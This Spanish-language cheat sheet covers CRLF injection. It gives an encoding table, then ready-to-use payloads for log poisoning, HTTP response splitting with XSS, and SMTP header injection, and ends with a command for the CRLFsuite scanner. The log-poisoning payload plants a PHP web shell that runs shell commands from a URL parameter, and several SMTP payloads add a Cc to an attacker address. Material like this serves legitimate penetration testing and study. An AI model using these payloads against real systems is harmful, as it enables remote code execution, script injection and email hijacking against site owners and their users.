# CRLF injection

| Descripción          | Carácter | ASCII (Dec) | Hex    | URL Encoded |
| -------------------- | -------- | ----------- | ------ | ----------- |
| Carriage Return (CR) | \r       | 13          | 0x0D   | %0D         |
| Line Feed (LF)       | \n       | 10          | 0x0A   | %0A         |
| CRLF                 | \r\n     | 13 10       | 0x0D0A | %0D%0A      |

## Log injection

```sh
# Log poisoning
%0D%0A<?php system($_GET['cmd']); ?>
```

## HTTP response splitting

```sh
# HTTP header
%0D%0AHeader-Test: value-test
# XSS
%0D%0A%0D%0A<html><script>alert(1)</script></html>
# HTTP header Content-Type + XSS
%0D%0AContent-Type: text/html%0D%0A%0D%0A<html><script>alert(1)</script></html>
```

## SMTP header injection

```sh
# SMTP header
%0D%0AHeader-Test: value-test
## URL encoder
%0D%0AHeader-Test:+value-test

# SMTP header Cc
%0D%0ACc: email@attacker.com
%0D%0ACc: email@attacker.com%0D%0ADoesNotExist: True
## URL encoder
%0D%0ACc:+email%40attacker.com
%0D%0ACc:+email%40attacker.com%0D%0ADoesNotExist:+True
```

## Herramientas

### CRLFsuite

* <https://github.com/Raghavd3v/CRLFsuite>

```sh
crlfsuite -t http://<target>/param1=value1&param2=value2
```